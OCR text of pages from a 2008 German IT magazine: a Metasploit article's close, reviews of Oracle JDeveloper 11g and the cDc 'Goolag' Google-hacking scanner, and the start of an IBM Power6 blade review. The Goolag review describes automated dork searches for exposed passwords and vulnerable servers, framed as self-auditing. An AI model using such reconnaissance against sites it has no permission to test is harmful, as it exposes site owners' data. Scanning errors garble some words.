Was in der Theorie manchmal abstrakt 
klingen mag, entpuppt sich spätestens 
dann als realistische Option, wenn 
man sich den Blog von Rise Security 
vom 08. Februar diesen Jahres ansieht 
(www risesecurity.org/blog/entry/6/). 

Die Gruppe hatte sich einen neuen 
Asus Eee PC angeschafft und quasi aus 
Spaß das Metasploit Framework darauf 
losgelassen. Schnell war klar, dass ei- 
ne verwundbare Samba-Version instal- 
liert war, und wenige Sekunden später 
hatte man Root-Rechte auf dem Eee 
PC. Rise titelte „Asus Eee PC rooted 
out of the box“ und konkludierte süffi- 
sant: „Easy to learn, Easy to work, Easy 
to root“. Bei Asus dürfte das kaum je- 
mand witzig gefunden haben. 

Auch allgemein dürfte ein solches Zi- 
tat kaum Anlass zum Lachen geben, de- 
monstriert es doch eindrucksvoll, wie 
trivial ein realer Angriff heute ablaufen 
kann. Die oder der verantwortungsvolle 
IT-Sicherheitsbeauftragte ist also gut be- 
raten, sich mit dem Metasploit Frame- 
work einmal näher zu beschäftigen. Die 
Feature-Vielfalt ist beeindruckend, das 
Projekt wird ständig weiterentwickelt, 
hat eine starke Community und ist oben- 
drein kostenlos. (JS) 


JÖRG RIETHER 


ist spezialisiert auf die Bereiche 
IT-Sicherheit, Hochverfügbarkeit und 
Virtualisierung. Er arbeitet als Abteilungsleiter 
der EDV bei der Zentrum für Soziale 
Psychiatrie Haina gGmbH. 
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Serviceorientierung 


Zukunftsaussichten: 


JDeveloper 11g Technology Preview 


SOA-Bauklötze 


Lars Niedermeier 


Mit der 3. Technology Preview vom JDeveloper I1g gibt Oracle 
erstmalig Einblick in die nun integrierte Fusion SOA Suite 11g. 
Wichtigste technische Neuerung: Die Laufzeitumgebung basiert 
jetzt auf der Komponentenarchitekur SCA. 


er mit dem JDeveloper 10.1.3 
und der zugehörigen SOA 
Suite geschäftskritische ser- 


viceorientierte Anwendungen entwi- 
ckelt, muss sich mit mannigfaltigen 
Infrastrukturfragen herumplagen. Er be- 
nötigt eine komplette Rechnerland- 
schaft bestehend aus mehreren Ser- 
vern inklusive Softwarekomponenten 
wie Enterprise Service Bus (ESB), Ap- 
plication Server und Oracle-Datenbank. 

Der JDeveloper 11g, derzeit in der 3. 
Technology Preview vorliegend, ent- 
hält nun die Laufzeitumgebung Fusion 
SOA Suite, ein Umstand, der dem Ent- 
wickler die Konzentration auf das We- 
sentliche erleichtern soll. Zum Beispiel 
kann er demnächst einen BPEL-Pro- 
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zess (Business Process Execution Lang- 
uage) direkt in der IDE ausführen, das 
bislang notwendige Deployment auf 
dem Application Server entfällt. Zum 
endgültigen Release-Datum der elften 
Generation äußert sich Oracle nicht ex- 
plizit, man kann aber davon ausgehen, 
dass sie Mitte des Jahres auf den Markt 
kommen wird. 

JDeveloper 11g unterstützt alle gän- 
gigen Java-Standards wie JEE5, EJB 
3.0 sowie JSF 1.2 und beherrscht das 
Editieren und Debuggen von Javascript. 
Ein UML-Modellierer ist jetzt inte- 
griert. Runderneuert hat Oracle das Ap- 
plication Developer Framework (ADF). 
Mithilfe des hauseigenen Open-Source- 
Produkts entstehen zum Beispiel die 


GUIs (Rich-Web-Clients) der Fusion- 
Anwendungen. Zudem kommt ADF bei 
Infrastruktursoftware wie der Enter- 
prise Manager Fusion Middleware 
Console sowie intern eingesetzten Ap- 
plikationen zum Einsatz. 

Mit ADF Faces und dem auf Java 
Server Faces (JSF) basierten ADF 
Controller Framework lassen sich de- 
klarativ Rich-Client-Webanwendungen 
entwickeln, die entweder als eigenstän- 
dige JEE-Programme laufen oder in 
die SOA-Suite integriert werden, etwa 
als „Human Tasks“, Teilprozesse, die 
menschliche Interaktion erfordern. Für 
Ajax-Entwickler steht eine Kompo- 
nentenbibliothek bereit. 


Web 2.0 im 


Unternehmenseinsatz 


Oracles Produktstrategen glauben, dass 
das sogenannte Social Computing (Wi- 
kis, Portale) im Unternehmen immer 
mehr Bedeutung gewinnt und haben 
deshalb das hierfür zuständige Web 
Center in 11g eingebaut. Nun kann der 
Entwickler mit dem JDeveloper ent- 
sprechende Intranet-Anwendungen bau- 
en. Zu beachten dabei: Ajax und Co. in 
l1g verlangen mindestens Version 7 
des Internet Explorer oder Firefox 
2.0.02, ansonsten zeigen sie die Seiten 
der neuen Rich Clients nicht an. 
Interessierte können sich die JDevel- 
oper-Preview im OTN als Build-Version 
4796 herunterladen. Das 769 MByte 
große Archiv für Windows enthält be- 
reits das notwendige JDK 5, die Linux- 
Variante nicht. Wer keine 10g-Daten- 
bank im Einsatz hat, auf die er als sysdba 
zugreifen darf, muss noch 10g XE in- 
stallieren (alle Downloads sind über den 
iX-Link am Ende des Textes erreichbar). 
Als Testrechner dienten verschiede- 
ne Notebooks (Intel Pentium 1 GByte 
RAM bis Intel 64-Bit Dual Core, 
2 GByte RAM) sowie einen Server 
mit Dual Core Athlons von AMD mit 
4 GByte Speicher und Virtualisierung 
unter XenV3 beziehungsweise Oracle- 
VM. Die verwendeten Betriebssysteme 
waren Windows XP, Vista Ultimate, 
Opensuse 10.3, Red Hat Enterprise 
Server 4 sowie Oracles Enterprise Li- 
nux 5 Update 1. Letzteres lief sogar als 
para-virtualisierte Guest-Domain unter 
OracleVM für die Oracle-XE-Daten- 
bank, JDeveloper und die SOA Suite. 
Die empfohlenen 2 GByte RAM erwie- 
sen sich als absolut notwendig. 
Sowohl unter Windows als auch 
unter Linux ist die Installation nach 
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wenigen Minuten abgeschlossen. Le- 
diglich veraltete JDKs zwangen spora- 
disch zur Fehlersuche. Mit dem folgen- 
den Linux-Befehl lässt sich die Version 
und der Installationsort des JDK ermit- 
teln: # rpm -q jdk -i -l I head -30. Als 
weitere Hürden vor dem Einsatz kön- 
nen sich die schiere Masse an Infor- 
mationen vom OTN sowie die nicht 
immer nachvollziehbaren Änderungen 
an den Webseiten erweisen. 

JDeveloper begrüßt den Anwender 
mit einer in fünf Rubriken geglieder- 
ten Startseite. Mittels Klick auf Build 
Applications gelangt man zum mehrtei- 
ligen Tutorial Build a Fusion Web Ap- 
plication, das ADF Faces, ADF Task 
Flows und ADF Business Components 
behandelt. Die einzelnen Schritte ver- 
anschaulicht eine sogenannte Cue Card, 
eine Hinweiskarte, die man als eine 
Mischung aus Onlinehilfe und Wizzard 
beschreiben kann. Sie lässt sich frei in 
der IDE platzieren und klont sich bei 
einem modalen Dialog selbst in einen 
Child-Dialog, der nie verdeckt wird. 

Falls die Hinweise der Cue Card 
nicht ausreichen, kann der Entwickler 
über den Hyperlink Tell me more (what 
I see in the IDE) weitere Details abru- 
fen. Wichtige Schritte sind ebenfalls mit 
Hyperlinks unterlegt, sodass er den Be- 
fehl direkt ausführen kann und nicht erst 
lange in der IDE suchen muss (Abb. 1). 
Eine funktionsfähige Infrastruktur vor- 
ausgesetzt, benötigt man für das Erstel- 
len der Fusion-Anwendung BrowseEdit- 
App nur 20 Minuten. 


Manuelle Kodierung 
auf dem Rückzug 


Positiv fällt auf, dass sich alle relevan- 
ten Teilschritte einzeln ausführen und 
testen lassen. Die Programmierung er- 
folgt hauptsächlich deklarativ (Ausfül- 
len von Dialogen, Drag & Drop, kein 
Java-Coding), wie man es aus Siebel- 
Werkzeugen kennt. Ebenfalls aus dem 
Siebel-System hat Oracle die Konzepte 


So präsentiert sich der JDeveloper I1g unter Vista Ultimate bei der Entwicklung 
mit ADF. Im Vordergrund sieht man die Cue Card (Abb. 1). 


LOV (List-of-Values) und Business 
Component übernommen. Siebel CRM 
wird mit der nächsten Release 8.1 
erstmalig ADF einsetzen. Dass sich 
grafische Auswertungswerkzeuge für 
Systemdaten (Transaktionen und Ähn- 
liches) leicht einbinden lassen, ist eben- 
falls angenehm. Neben dem im Tutorial 
verwendeten Balkendiagramm existie- 
ren über 20 weitere Diagrammtypen. 
Das 590 Seiten umfassende PDF- 
Dokument „Web User Interface De- 
velopers Guide for Oracle Application 
Development Framework 11g“ (im In- 
stallationsumfang enthalten) und die 
Online-Dokumentation der ADF Faces 
Rich Client Tags beschreiben die Mög- 
lichkeiten von ADF. Zur Vertiefung 
liefert Oracle den 1250 Seiten starken 
PDF-Wäilzer „Fusion Developers Guide 
for Oracle ADF 11g“. Er beschreibt 
beispielsweise, wie man komplexe ADF 
Task Flows erstellt, die mit einem 
BPEL-Prozess interagieren. 
Peoplesoft, JD Edwards und Siebel, 
die zugekauften ERP- und CRM-Pro- 
dukte, sollen in den Fusion Applica- 
tions aufgehen. Laut Oracle kommen 


Laufzeitumgebung SOA Suite. 


JD Edwards und Peoplesoft. 


A-TRACT 


© Oracles Entwicklungssystem JDeveloper I1g enthält die bislang eigenständige 


© In der nächsten Generation stellt Oracle sein Fusion-Softwaresystem auf die von 
OASIS standardisierte Komponentenarchitektur SCA um. 


@ Noch in diesem Jahr sollen die ersten Fusion-Anwendungen das Licht der Welt 
erblicken. Sie enthalten alle Merkmale der ERP- und CRM-Produkte von Siebel, 


iX 6/2008 


die ersten in diesem Jahr auf den Markt. 
Peoplesoft CRM verwendet intern be- 
reits mit dem Release 9 den BPEL Pro- 
cess Manager sowie Business Activity 
Monitoring von Fusion. 


Neue Basis: 
Komponentenmodell SCA 


Die wichtigste technische Umstellung 
ist die auf den OASIS-Standard SCA, 
(Service Component Architecture) [1]. 
Dabei handelt es sich um ein Kompo- 
nentenmodell für serviceorientierte An- 
wendungen, die aus sogenannten Com- 
posites zusammengebaut werden. Sie 
sind die kleinsten Deployment Units. 
Eine SOA Composite setzt sich aus 
verschiedenen Components zusammen. 
Das können BPEL-Prozesse, Human 
Workflows, Business Rules oder das 
im Oracle-Jargon „Mediator“ genann- 
te ESB Routing sein. Mit dem Com- 
posite-Editor führt der Entwickler die 
Teile zusammen (Abb. 2). Das Ergeb- 
nis ähnelt einem Schaltplan für digitale 
Bauelemente. Neben SCA unterstützt 
llg BPEL 2.0 sowie die Standards 
WS-ReliableMessaging, WS-PolicyAt- 
tachment, WS-MetadataExchange und 
WS-SecurityPolicy. 

Für den schnellen Einstieg bietet 11g 
das auf Cue Cards basierende „Build a 
SOA Composite Application“. Oracle 
verspricht Upgrade-Pfade für die Vor- 
gängerprojekte — entweder interaktiv 
über JDeveloper oder per Kommando- 
zeile für den Batch-Betrieb. Die über 
1000 Seiten umfassende „Einführung“ 
in die SOA-Suite und SCA beschreibt 
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JDeveloper vereint die verschiedenen Elemente einer SOA Composite- 
Anwendung (wie BPEL-Prozess, ESB Mediator, Webservice-Interface) unter 
einer Oberfläche (Abb. 2). 


detailliert die Umsetzung der Kompon- 
entenarchitektur sowie die Interopera- 
bilität der SOA-Suite mit anderen haus- 
eigenen Produkten. 

l1g soll Unternehmen in Lage ver- 
setzen, SOA inkrementell einzuführen. 
Bei komplizierten und langlebigen Pro- 
zessen kommt BPEL zum Einsatz. Für 
das Einbinden von menschlichen Auf- 
gaben in Geschäftsabläufe (etwa für 
Eskalationsszenarien) stehen Human 
Workflows bereit. Dafür bietet 11g ei- 
ne vorgefertigte Ajax-Worklist sowie 
umfangreiche Notifikationsmechanis- 
men (SMS, E-Mail, Telefonanruf). Pro- 
zesse mit Massendurchsatz wiederum 
erfordern ESB-Techniken wie Daten- 
transformation und Routing. Über Ge- 
schäftsregeln kann das Unternehmen 
das Programmverhalten auch nach dem 
Deployment anpassen, wenn es auf 
kurzfristig geänderte Rahmenbedingun- 
gen reagieren muss. 

Erfahrungen aus EAI-Projekten mit 
Webservices zeigen, dass sich Qualität 
und Termintreue nur dann einhalten las- 
sen, wenn die Webservices zuerst im 
Einzelbetrieb ihre Tauglichkeit bewie- 
sen haben. Erst danach ist es sinnvoll, 
sie im Verbund zu begutachten. Ähnlich 
wie bei der objektorientierten Program- 
mierung entscheidet auch bei der SOA- 
Entwicklung das begleitende Testen 
während der einzelnen Projektphasen 
über den Erfolg. Wer erst zum Entwick- 
lungsende prüft, wird kein funktions- 
tüchtiges Projekt abliefern. Aus diesem 
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Grund hat Oracle das vom Vorgänger 
bekannte BPEL-Test-Framework für die 
Compeosites weiterentwickelt. Die Unit- 
Tests definiert der Programmierer im 
JDeveloper. Er kann sie sowohl interak- 
tiv über die SOA-Konsole als auch im 
Batch mittels Ant ausführen. 

Es war bisher notwendig, die zur 
Designzeit generierten WSDL-Dateien 
für die verschiedenen Test- und Pro- 
duktionsumgebungen anzupassen. Unter 
Umständen sind diese Arbeiten ebenso 
aufwendig wie die eigentliche Entwick- 
lung. 11g reagiert darauf mit den JSR- 
88-basierten Deployment Plans, die alle 
umgebungsspezifischen Konfiguratio- 
nen enthalten und das von 10.1.3 be- 
kannte Versionierungskonzept von 
BPEL-Prozessen auf die SOA Compo- 
sites übertragen. Eine Composite wird 
mit dem SCA Packager in eine .sar- 
Datei mit einem Revision Tag gepackt, 
das die jeweiligen SCA-Komponenten 
enthält. Nach dem Deployment-Plan 
erstellt der EAR Packager aus weiteren 
JEE-Archiven wie .war oder ejb.jar das 
.ear. Letzteres lässt sich von JDevel- 
oper, aus dem Fusion Enterprise Mana- 
ger oder über die Kommandozeile 
mittels Ant auf dem Applikationsserver 
einrichten. 

Weitere Neuerungen gibt es beim 
Monitoring und Management der SOA. 
Das Monitoring via BPEL- sowie ESB- 
Konsole ist jetzt in den Fusion Enter- 
prise Manager integriert. Die Über- 
wachung von Services erstreckt sich 


über alle involvierten Komponenten 
und gehört zur Enterprise Manager Fu- 
sion Middleware Control (EM FMC). 
Jede Prozessinstanz erhält eine ID, über 
die man suchen kann. Im Fehlerfall lässt 
sich die Instanz erneut ausführen und 
sogar als Unit Test speichern. Die zen- 
trale Fusion-Komponente stellt der ESB, 
der mit über 200 Applikations- und 
B2B-Adaptern (SAP, CICS, EDI, Ro- 
settaNet et cetera) die Infrastruktur lie- 
fert. Er erledigt auch das Logging, Tra- 
cking und Monitoring für alle Services. 

Um die Autorisierung, Authentifi- 
zierung und Nachrichtenintegrität für 
den Zugriff von außen kümmert sich 
der Policy Manager. Intern sind Service 
Component Interceptors für die Autho- 
risierung bei jedem Übergang von einer 
Service-Komponente auf eine andere 
gemäß der Policies zuständig. Alle Si- 
cherheitsprüfungen erfolgen zur Lauf- 
zeit. Hierzu verwendet der Policy Ma- 
nager die standardisierte Java Platform 
Security. 


Fazit 


Wer sich die 3. Technology Preview des 
JDevelopers anschaut, bekommt eine 
klare Vorstellung davon, wie die elfte 
Generation der Fusion-Softwarepalette 
aussehen wird. Oracles neue Offenheit 
in Bezug auf Standards wird jedoch zum 
Preis einer niedrigeren Abstraktionsebe- 
ne erkauft. Hier entsteht die Gefahr, dass 
die Entwickler sich in der Komplexitäts- 
falle verfangen und darunter ihre eigent- 
liche Aufgabe — das Umsetzen von Ge- 
schäftsanforderungen - leidet. Mit der 
neuen Release sollte Oracle jedoch in 
der Lage sein, die Produkte aus den 
Aufkäufen der Firmen Siebel, People- 
soft und JD Edwards in SOA-Applika- 
tionen zu fusionieren. (jd) 


LARS NIEDERMEIER 


ist unabhängiger Berater für Siebel 
CRM und EA. Er setzt Oracles Fusion 
SOA Suite zusammen mit Siebel CRM 
zur Qualitätssicherung und Prozess- 
optimierung bei einer Schweizer 


Großbank ein. 
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Sicherheitswerkzeug 


About GoolagScanner 


Goslag 


Version 1.0.0.41 


Webseiten prüfen mit Goolag 


Tief graben 


Michael Hamm 


Goolag Scanner is a Web auditing tool. It works by exploiting 
data- retention practices of popular search engines. We 
would like to thank everyone who contributed to this project, 
especially Google, without whom this fearsome software 
would rot be possible. 


show at startup 


GNU Affero General Public License 


Goagle's Terms of Service 


sich das sogenannte Google-Ha- 

cking — populär geworden durch die 
Recherchen von Johnny (I hack stuff) 
Long zu einer beeindruckenden Ha- 
cking-Disziplin [1]. Es war daher nur ei- 
ne Frage der Zeit, bis jemand auf die 
Idee kam, diese Technik zu automatisie- 
ren und mit einer bequemen Benutzer- 
oberfläche zu versehen. Seit Kurzem 
steht Interessierten für Sicherheitstests 
das unter der Affero GPL [2] verfügbare 
Werkzeug Goolag zur Verfügung, das 
nach Schwachstellen und verräterischen 
Informationen in Webauftritten sucht. 

Es stammt von „Cult of the Dead 
Cow“ (cDc; www.cultdeadcow.com), 
einer Hackergruppe, die 1998 durch die 
Veröffentlichung des „Fernwartungs- 
werkzeuges“ Back Orifice — das häufig 
missbräuchlich eingesetzt wurde — 
weltweite Berühmtheit erlangte. Und 
genau wie damals pocht heute ein Spre- 
cher der Gruppe darauf, dass Goolag 
nicht als Hacker-Tool, sondern als 
Werkzeug zum Sensibilisieren der Ver- 
antwortlichen und Überprüfen der eige- 
nen Sicherheit gedacht ist. 

Goolag ist eine Windows-Anwen- 
dung, die man kostenlos auf der Websei- 
te www.goolag.org herunterladen kann. 
Genauer gesagt, befinden sich im Down- 
load-Bereich Verweise zu den offiziellen 
Mirrors. Für Interessierte stellen die An- 
bieter ebenfalls die Sourcen bereit. 


f nnerhalb weniger Jahre entwickelte 


Starten, aber mit Gefühl 


Nach dem Installieren blendet Goolag 
beim ersten Programmstart den „About“- 
Dialog als Willkommensnachricht ein. 
Der dort vorhandene Text „... popular 
search engines“ lässt vermuten, dass 
dieses Tool nicht nur Google, sondern 
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Ob Schwachstellen, verwundbare Webanwendungen oder 
versehentlich ins Netz gestellte sensible Daten - das 
Sicherheitswerkzeug Goolag hilft durch automatisierte Tests 


bei der Suche danach. 


auch alternative Suchmaschinen in sei- 
ne Queries einbezieht. 

Zurzeit ist das aber nicht der Fall. 
Beim Überwachen des Netzwerkver- 
kehrs lassen sich lediglich Anfragen 
bei Google beobachten. Ein Blick in 
die mitgelieferte Google-Hack-Daten- 
bank „gdorks.xml“ legt die Vermutung 
nahe, dass Goolag in dieser Version 
noch nicht fähig ist, andere Suchma- 
schinen anzusprechen. 


Nicht alles, was geht, 
ist auch erlaubt 


Weiter findet sich im Begrüßungsdia- 
log ein Verweis auf Google’s Terms of 
Service, die Nutzungsbedingungen. Ih- 
nen zufolge ist das, was das Werkzeug 
macht — das automatisierte Senden von 
Suchanfragen -, nicht erlaubt. 

So ist beim ersten Experimentieren 
mit Goolag äußerste Vorsicht geboten, 
vor allem wenn man es von der eigenen 
Firma aus startet. Dann könnte Google 
schon nach wenigen Sekunden die lo- 
kale IP-Adresse sperren, was je nach 
Netzwerk-Topologie schnell zu Ver- 
stimmungen bei Kollegen, Managern 
und Systemadministratoren führen kann. 

Die Bedienung des Werkzeugs ist in- 
tuitiv. Binnen weniger Minuten kann der 
Anwender den Funktionsumfang erfas- 
sen und verstehen. Das Hauptfenster 
(Abb. 1) unterteilt sich vertikal in zwei 
Bereiche. Linker Hand findet sich eine 
baumartig sortierte Liste der aktuell ver- 
fügbaren Google-Hacks, auch Google- 
Dorks genannt, zurzeit sind es 1418. 

Die Google-Hacks sind je nach The- 
ma in 14 Gruppen zusammengefasst, 
darunter Kategorien wie „Files Contai- 
ning Passwords“, „Sensitive Directo- 
ries“, „Vulnerable Servers“. Sowohl die 


Gruppierung als auch die Hacks selbst 
haben die Goolag-Programmierer offen- 
sichtlich 1:1 aus der Google Hacking 
Database von Johnny Long (johnny. 
ihackstuff.com/ghdb.php) übernommen. 
In ihr sind die Hacks nach dem Er- 
scheinungsdatum sortiert, während Goo- 
lag sie alphabetisch auflistet. 

Auf der rechten Seite der Anwen- 
dung befinden sich Informationen zum 
laufenden Scan. Dazu ist diese Bild- 
schirmseite in die Bereiche „Dork In- 
fo“ „Results“ und „Console“ unterteilt. 
Der Erste zeigt den aktuell ausgeführ- 
ten Google-Hack sowie Hintergrundin- 
formationen an. Diese variieren von 
Hack zu Hack und beinhalten beispiels- 
weise eine Beschreibung, den Namen 
des Autors oder gar Verweise zu exis- 
tierenden Advisories und Exploits. 

Im Results-Bereich erscheint eine 

Liste der bisher durchgeführten Goo- 
gle-Anfragen sowie deren Status und 
gegebenenfalls gefundene URLs. Der 
Status eines Google-Hacks kann sein: 
— clean, in dem Fall hat Goolag keine 
verwundbaren Ziele gefunden; 
- failed, was bedeutet, Google hat die 
Suchanfrage eventuell als Sicherheits- 
problem erkannt und nicht beantwortet; 
— success, Goolag hat Schwachstellen 
gefunden. 

Im Eingabefeld „Host“ kann der Si- 
cherheitstester einen zu überprüfenden 
Host- oder Domainnamen eintragen. 
Will er wahllos nach verwundbaren 
Zielen suchen, braucht er nichts einzu- 
tragen. Der eingetragene Host- oder 
Domainname wird unter der Haube in 
der Form +site:foo.com an den Goo- 
gle-Dork angefügt. 

In der Praxis zeigt sich, dass ein kom- 
pletter Scan über alle 1418 Queries min- 
destens sechs Stunden dauern sollte. So 
kann man eine Blockade der eigenen 
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Sicherheitswerkzeug 


©0o00000000.x 7 


Bei Durchführung eines der links aufgeführten, thematisch gruppierten Hacks 
sieht der Sicherheitstester in der rechten Hälfte die Ergebnisse seines Scans 


sowie weitere Informationen (Abb. 1). 


IP-Adresse bei Google vermeiden. Beim 
Setzen der entsprechenden Werte für die 
Scan-Geschwindigkeit in den Optionen 
ist also Zurückhaltung geboten. 

Scan-Fortschritt plus die jeweiligen 
Ergebnisse kann man live in der An- 
wendung beobachten. Am Ende des 
Scans präsentiert ein kleines Popup- 
Fenster überdies eine kurze Zusam- 
menfassung der Resultate. 

Landet man einen Treffer (Success), 
und das Werkzeug hat eventuelle 
Schwachstellen gefunden, braucht der 
Anwender nur durch einfaches Ankli- 
cken der Zeile seinen Browser zu star- 


Goolag 


Produkt: Sicherheitsscanner für Webseiten 
Lizenz: Affero GPL 
Betriebssystem: Windows 


® bedienungsfreundliches Werkzeug 


@® zahlreiche, nach Themen gruppierte 
Hacks 


©& sensibilisiert für Suchmaschinen-Hacks 
© keine alternativen Suchmaschinen 


© keine Export- oder Berichtsfunktion für 
Ergebnisse 


© keine Online-Update-Funktion 
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ten, der die entsprechende Webseite 
lädt. Nun kann man die Seite genauer 
untersuchen. 

Wie bei allen Schwachstellen-Scan- 
nern ist es unerlässlich, alle Treffer 
manuell zu validieren, um die Fehl- 
meldungen — False Positives — zu eli- 
minieren. Das ist zwar lästig, bei Wei- 
tem aber nicht so sicherheitskritisch 
wie False Negatives, also nicht identi- 
fizierte Schwachstellen. 


Mehr Suchmaschinen 
gewünscht 


Die Scan-Ergebnisse können leider in 
keiner Weise exportiert, ausgedruckt 
oder zu einem Report aufbereitet wer- 
den. Hier besteht noch reichlich Opti- 
mierungspotenzial für Weiterentwick- 
lungen oder neue Anwendungen. 

Auch beim Umgang mit den Google- 
Dorks sind Verbesserungen möglich. 
Wünschenswert wäre es auf jeden Fall, 
andere Suchmaschinen in die Abfragen 
einbeziehen zu können. Das ließe sich 
durch das Erstellen einer neuen Abstrak- 
tionsebene für eine suchmaschinenun- 
abhängige Abfragesprache realisieren. 

Eine Online-Update-Funktion für 
neu verfügbare Google-Dorks gibt es 
momentan nicht. Eigene Google-Hacks 
lassen sich zurzeit nicht über die An- 
wendung verwalten. Das bedeutet, man 


muss sie entweder via Texteditor in die 
Datei gdorks xml oder gar in eine eige- 
ne Datei einpflegen. 

Überdies wäre eine Funktion zum 
Verfeinern der gerade laufenden Such- 
anfragen eine sinnvolle Erweiterung. 
Von einem Werkzeug für ein umfang- 
reiches Security Auditing ist Goolag 
noch ein ganzes Stück entfernt - aller- 
dings war das vermutlich nicht die In- 
tention der Entwickler. 

Denen ging es offensichtlich viel 
mehr um ein gewisses Maß an Aufmerk- 
samkeit und darum, für die Gefahren 
durch das stark unterschätzte Google- 
Hacking zu sensibilisieren. Zurzeit ist es 
einfach immer noch zu leicht, Zugangs- 
daten wie Passwörter, vertrauliche Infor- 
mationen und verwundbare Webserver 
via einfacher Suchmaschinenanfragen 
zu finden. Hier bedarf es dringend der 
Aufklärung der Verantwortlichen. 

Mit Goolag hat nun jeder die Mög- 
lichkeit, eigene Netzwerke zumindest 
auf die gröbsten Sicherheitsrisiken durch 
Google-Hacking zu untersuchen und 
sich gleichzeitig in die Materie einzu- 
arbeiten. Womit Goolag genau das tut, 
was es soll: aufklären, sensibilisieren 
und eine erste Übersicht verschaffen. 

Nach Aussagen von cDc (www.goo 
lag.org/factsheet.txt) hatten die Gruppe 
sowie einige Testpartner Goolag intern 
bereits drei Jahre lang vor seiner Ver- 
öffentlichung eingesetzt — vorrangig 
um militärische und staatliche Netz- 
werke in den USA, Kanada, England, 
Frankreich, der Türkei und Saudi Ara- 
bien zu überprüfen. Angeblich entdeck- 
ten sie dabei so gravierende Lücken, 
dass sie die gefundenen Daten auch 
teilweise an das „Department of Home- 
land Security“ weitergaben. 

Jedem Systemverantwortlichen kann 
man nur wärmstens empfehlen, das ei- 
gene Netzwerk mit Goolag auf offene 
Sicherheitslücken hin zu überprüfen — 
bevor es jemand anderes tut. (ur) 


MICHAEL HAMM 


ist Ingenieur Securite am Centre de 
Recherche Public Henri Tudor in 
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Unix-Server 


IBMs Powerö unter AIX 6.1 und Linux im 


Bladecenter 


Zwei Sechser 


Ralph Hülsenbusch 


Fern von den umkämpften Grenzen der massenträchtigen 
Betriebssysteme und Prozessoren errichtet Big Blue eine 


Bastion für seinen RISC-Prozessor Power6 und sein Unix AIX 6. 
Allein der Schwenk von AIX 5L auf AIX 6 - ohne das Linux-L - 


spricht für sich. 


inen Paradigmenwechsel hat 
FE IBM auf Ebene 6 vollzogen: Die 

neue Power6-CPU — Power steht 
für „Performance optimized with en- 
hanced RISC“ - steigert den Prozes- 
sortakt gegenüber dem Vorgänger Pow- 
er5+ auf mehr als das Doppelte: 4,7 
GHz statt bisher 2,2 GHz führen in eine 
neue Dimension. IBM steht noch beim 
65-nm-Prozess wie Suns Ultrasparc T2 
und Intels Itanium, beim Core 2 
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(,„Penryn‘“) ist Intel einen Schritt wei- 
ter mit 45 nm, AMD will noch 2008 
mit Shanghai folgen. Aber mehr als 
3,6 GHz sind dort bisher nicht zu 
sehen. Dafür versuchen die Chip- 
schmieden, mit der Vervielfältigung 
der Kerne aufzuholen. Während es 
beim Power5 noch Module mit meh- 
reren Prozessorchips waren — Multi 
Chip Modules (MCM) - besitzt der 
Power6 jetzt ebenfalls mehrere Kerne. 


Bei der aktuellen Version sind es 
zwei, während Intel und AMD auf 
drei, vier und sechs aufgestockt ha- 
ben. Im Gegensatz zu Intel hat IBM 
die Hardware-Thread-Technik beibe- 
halten: pro Core zwei. Eine Power6- 
CPU mit zwei Kernen stellt dem 
Betriebssystem somit vier Rechenein- 
heiten bereit. 

Nach der Jungfernfahrt des Power6 
in IBMs Midrange System i liefen 
beim System p die Blades vom Stapel. 
IBM bot zwei JS22 mit je zwei 4- 
GHZ-CPUs an. Sie verfügen wie die 
4,7 GHz schnelle Variante über zwei 
Kerne pro Chip, denen je 4 MByte L2- 
Cache zur Verfügung stehen. Die eine 
Blade war mit AIX 6.1, die andere mit 
Suse Linux eingerichtet, und IBM hat- 
te die hauseigenen XL-Compiler in 
der aktuellen Version (9.0) installiert. 
Beide Server waren mit 16 GByte 
Hauptspeicher voll bestückt, das Be- 
triebssystem nebst der Entwicklungs- 
umgebung befand sich auf lokalen 
Platten. 


Start auf großer Plattform 


Vom Systemvermieter Livingston kam 
das notwendige Kabinett. Aufbau und 
Start des Gesamtsystems nahm ein 
Techniker von IBM vor, anschließend 
ging es per DHCP ins Testnetz. Die 
üblichen Prozeduren waren flott erle- 
digt, die Administration per Webbrow- 
ser im Out-of-Band-Netz bereitete kei- 
ne Schwierigkeiten, abgesehen von 
den üblichen Geduldsproben, bis die 
Server die Interfaces für das Konsolen- 
Display hochgefahren hatten. 

Von der Verarbeitung her gibt es 
nichts zu bemängeln. Die Blades sind 
servicefreundlich zu öffnen (wenn man 
es nicht auf der falschen Seite versucht) 
und gediegen — so gut wie keine Kunst- 
stoffteile. Die mit fast 5 kg nicht gerade 
leichten Server-Module gleiten sauber 
geführt durch Abdeckungen der inne- 
ren Luftschleusen in den Einbaurahmen 
und lassen sich leicht verriegeln. Das 
Umschalten auf KVM und Media- 
Laufwerk funktioniert weitgehend ver- 
zögerungsfrei. Nur wenn Keyboard 
samt Maus und Monitor am rück wärti- 
gen Service-Modul angeschlossen sind, 
muss man unter Linux beim Fernzu- 
griff über die Administrationssoftware 
auf die Konsole der Blade verzichten — 
etwas fürs Aufgabenheft bei Suse/ 
Novell. 

Im Laufe des Tests verlor die Blade 
mit Linux einen Teil ihres Hauptspei- 
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chers und erkannte nur noch 4 GByte. 
Versuche, Speichermodule zu tau- 
schen, führten nicht weiter. Der Feh- 
ler musste im Memory-Controller ste- 
cken. IBM lieferte eine neue Blade, 
die sich selbst nach Hot Swap beim 
Allozieren des Speichers nicht irritie- 
ren ließ. Die Erklärung von IBMs Sei- 
te: iX habe die ersten Blades aus der 
Preproduction erhalten — die neue kam 
aus dem Produktionszyklus, aus dem 
die Kunden ihre Systeme bezögen. 


Für Optimierung 
zu wenig Speicher 


Widerspenstiger verhielten sich beide 
Server beim Versuch, SPECs CPU2006 
mit den XL-Compilern zu übersetzen. 
Dass Compiler bei 32 GByte Out of 
Memory laufen, scheint ein neuer 
Trend zu sein. Einen ähnlichen Effekt 
gab es bei Tests mit Suns Niagara [1]. 
Erst ein Verzicht auf Optimierung und 
ipo führt zu ausführbarem Code. Nur 
reichen die Benchmarks-Ergebnisse 
mit SPEC_int_base2006 von 11,2 
(AIX) und 10,1 (Linux) bei Weitem 
nicht an die von IBM für die JS22 ver- 
öffentlichten heran. Erst eine Rückfra- 
ge in den USA beim Benchmarking 
förderte das zutage, was bei der SPEC 
sozusagen als Randbemerkung zu le- 
sen ist: „The binaries were compiled 
on a system with 32 GB of memory.“ 
Man mag es kaum glauben, aber aus 
den USA kam die Bestätigung: „The 
larger memory is necessary in order 


for the compiler to perform its inter- 
procedural analysis on some of the co- 
des at high optimizations.“ — Das ist 
das härteste, was es bisher an Opti- 
mierung in der langen Geschichte des 
Benchmarking gab. 


Auf dem 
Benchmark-Olymp 


Da es nicht gelang, trotz mehrfacher 
Anfragen und Bemühungen bei IBMs 
